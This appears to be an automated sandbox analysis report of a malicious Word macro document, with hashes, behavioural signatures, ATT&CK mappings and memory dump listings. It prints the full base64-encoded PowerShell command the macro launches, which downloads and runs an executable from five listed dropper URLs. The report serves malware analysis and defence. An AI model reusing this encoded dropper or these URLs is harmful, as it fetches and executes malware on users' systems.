fd6d3fed5485d19798b1169fdf5e5e5101c8a0042301dd10785d1645230b6062

General

Target

fa9c5182373ff45ab8199453ad96b1d6_JaffaCakes118.doc
Size

480KB
MD5

fa9c5182373ff45ab8199453ad96b1d6
SHA1

e4e16496a9629f1001e05b75c4dbeda77d6d091c
SHA256

fd6d3fed5485d19798b1169fdf5e5e5101c8a0042301dd10785d1645230b6062
SHA512

8de4b705fbe7314665c3c7bdf73128b57c23a309b222b561ada35b08da2feab614f0a02e06c5ed084e3fe6ce76fdc07e159a1b63506e82d9dba2c9715a265c95
SSDEEP

6144:zdlSApEXv/354poAMzSVIhl9EKRDqME4yanMjdn/NQVg+D3Do8oRtxQwvVAJTVH:zDSApaX54poA8SVIf51E4K14o8IuD

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://www.venturelendingllc.com/Wxw9QNt8I

exe.dropper

http://barabooseniorhigh.com/FWLR2ZT

exe.dropper

http://mimiabner.com/x7bQDOiSJe

exe.dropper

http://vesidailucachau.com/F1zcXKyj

exe.dropper

http://altuntuval.com/8cfiGmIXk

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	1052	POwershell.exe	29

Blocklisted process makes network request 7 IoCs

flow	pid	Process
5	2188	POwershell.exe
6	2188	POwershell.exe
7	2188	POwershell.exe
10	2188	POwershell.exe
13	2188	POwershell.exe
14	2188	POwershell.exe
15	2188	POwershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POwershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1140	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2188	POwershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2188	POwershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1140	WINWORD.EXE
1140	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1140 wrote to memory of 976	1140	WINWORD.EXE	33
PID 1140 wrote to memory of 976	1140	WINWORD.EXE	33
PID 1140 wrote to memory of 976	1140	WINWORD.EXE	33
PID 1140 wrote to memory of 976	1140	WINWORD.EXE	33

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fa9c5182373ff45ab8199453ad96b1d6_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1140
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\POwershell.exe
POwershell -e JABqADQANwAxAF8AMAA9ACgAJwBBADgAXwA5ADIAJwArACcAOQAnACsAJwA1ACcAKQA7ACQAegA3ADcAMAA1ADYAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQASQA5ADMAMAA0ADUAOAA9ACgAJwBoAHQAJwArACcAdABwADoALwAvAHcAdwB3ACcAKwAnAC4AdgAnACsAJwBlACcAKwAnAG4AJwArACcAdAB1AHIAZQAnACsAJwBsAGUAJwArACcAbgBkAGkAJwArACcAbgBnAGwAbABjAC4AYwAnACsAJwBvAG0ALwAnACsAJwBXAHgAdwA5ACcAKwAnAFEATgAnACsAJwB0ADgASQBAAGgAJwArACcAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AJwArACcAYgAnACsAJwBhAHIAYQAnACsAJwBiAG8AbwAnACsAJwBzAGUAbgBpAG8AcgBoAGkAZwBoAC4AYwBvAG0ALwBGACcAKwAnAFcAJwArACcATABSACcAKwAnADIAWgAnACsAJwBUAEAAJwArACcAaAB0AHQAcAAnACsAJwA6AC8AJwArACcALwBtAGkAbQAnACsAJwBpACcAKwAnAGEAJwArACcAYgBuAGUAJwArACcAcgAuACcAKwAnAGMAJwArACcAbwBtAC8AeAA3AGIAUQBEAE8AaQBTAEoAZQBAAGgAdAB0AHAAJwArACcAOgAvAC8AdgBlAHMAJwArACcAaQBkAGEAaQAnACsAJwBsAHUAYwBhAGMAaABhAHUALgBjAG8AbQAnACsAJwAvAEYAMQAnACsAJwB6ACcAKwAnAGMAWABLACcAKwAnAHkAagBAACcAKwAnAGgAJwArACcAdAB0AHAAOgAnACsAJwAvAC8AYQBsACcAKwAnAHQAJwArACcAdQAnACsAJwBuAHQAJwArACcAdQAnACsAJwB2AGEAbAAnACsAJwAuAGMAbwBtAC8AOABjAGYAaQBHAG0ASQBYAGsAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAegA4AF8ANQBfADQAPQAoACcAUQAnACsAJwBfAF8AMgA4AF8AMgA4ACcAKQA7ACQATgAwAF8ANwA5ADgAMwAgAD0AIAAoACcAMgAxACcAKwAnADUAJwApADsAJABOADMANQA1ADAAXwA9ACgAJwBOAF8AMwAxACcAKwAnADAAXwAnACsAJwA3ADgAJwApADsAJABIAF8ANQA0ADQANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgAwAF8ANwA5ADgAMwArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGQAMwA1ADQANgA1AF8ANQAgAGkAbgAgACQASQA5ADMAMAA0ADUAOAApAHsAdAByAHkAewAkAHoANwA3ADAANQA2AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAMwA1ADQANgA1AF8ANQAsACAAJABIAF8ANQA0ADQANwApADsAJAByAF8AMQA3ADUANwA9ACgAJwBOACcAKwAnADcAXwBfADIAXwAnACsAJwA2ADQAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQASABfADUANAA0ADcAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABIAF8ANQA0ADQANwA7ACQAagAzADMANgA5ADUAPQAoACcASABfADIAMwAnACsAJwAyADUANgA3ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABFAF8AXwBfADkAMAA5AD0AKAAnAFkAXwA1ADAANwAnACsAJwA5ACcAKQA7AA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
af4b4c5edd1b67826538699b35168a55

SHA1
5d52d650fdc88558094cfd2f2a0687325d53a3b8

SHA256
5147e33dc8fa1ae5cd6243c34a3add7363fc44aed1fd1988e7f711552d6ba265

SHA512
1630744a40ef84661db23a39ea1f29c00a67b0ef90c0bb1e38264aca4b0ca9f79c1aeb729a532a8cf530a11988187d0fb131f042c45defaf1755e6ab0230f790

Download Submit
memory/1140-120-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-68-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-159-0x000000007106D000-0x0000000071078000-memory.dmp

Filesize
44KB

Download
memory/1140-30-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-158-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1140-122-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-121-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-134-0x000000007106D000-0x0000000071078000-memory.dmp

Filesize
44KB

Download
memory/1140-17-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-2-0x000000007106D000-0x0000000071078000-memory.dmp

Filesize
44KB

Download
memory/1140-0-0x000000002F0F1000-0x000000002F0F2000-memory.dmp

Filesize
4KB

Download
memory/1140-135-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-136-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-137-0x0000000005570000-0x0000000005670000-memory.dmp

Filesize
1024KB

Download
memory/1140-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2188-129-0x0000000002460000-0x0000000002468000-memory.dmp

Filesize
32KB

Download
memory/2188-128-0x000000001B310000-0x000000001B5F2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads